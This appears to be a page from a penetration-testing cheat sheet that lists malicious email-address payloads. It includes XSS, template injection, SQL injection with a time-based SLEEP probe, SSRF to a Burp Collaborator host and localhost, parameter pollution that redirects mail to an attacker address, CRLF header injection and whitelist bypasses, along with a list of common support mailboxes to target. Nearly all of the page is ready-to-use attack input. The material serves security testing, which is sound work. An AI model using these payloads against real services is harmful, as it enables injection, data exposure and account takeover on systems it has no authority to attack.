Email attacks

Attack

Payload

XSS

test+(alert(0))@example.com

test@example(alert(0)).com

"alert(0)"@example.com

Template injection

"<%= 7 * 7 %>"@example.com

test+(${{7*7}})@example.com

SQLi

"' OR 1=1 -- '"@example.com

"mail'); SELECT version();--"@example.com

a'-IF(LENGTH(database())=9,SLEEP(7),0)or'1'='1\"@a.com

SSRF

john.doe@abc123.burpcollaborator.net

john.doe@[127.0.0.1]

Parameter Pollution

victim&email=attacker@example.com

(Email) Header Injection

"%0d%0aContent-Length:%200%0d%0a%0d%0a"@example.com

"recipient@test.com>\r\nRCPT TO:<victim+"@test.com

Wildcard abuse

%@example.com

# Bypass whitelist
inti(;inti@inti.io;)@whitelisted.com
inti@inti.io(@whitelisted.com)
inti+(@whitelisted.com;)@inti.io

#HTML Injection in Gmail
inti.de.ceukelaire+(<b>bold<u>underline<s>strike<br/>newline<strong>strong<sup>sup<sub>sub)@gmail.com

# Bypass strict validators
# Login with SSO & integrations
GitHub & Salesforce allow xss in email, create account and abuse with login integration

# Common email accounts
support@
jira@
print@
feedback@
asana@
slack@
hello@
bug(s)@
upload@
service@
it@
test@
help@
tickets@
tweet@

PreviousSession fixation NextPastejacking

Last updated 4 years ago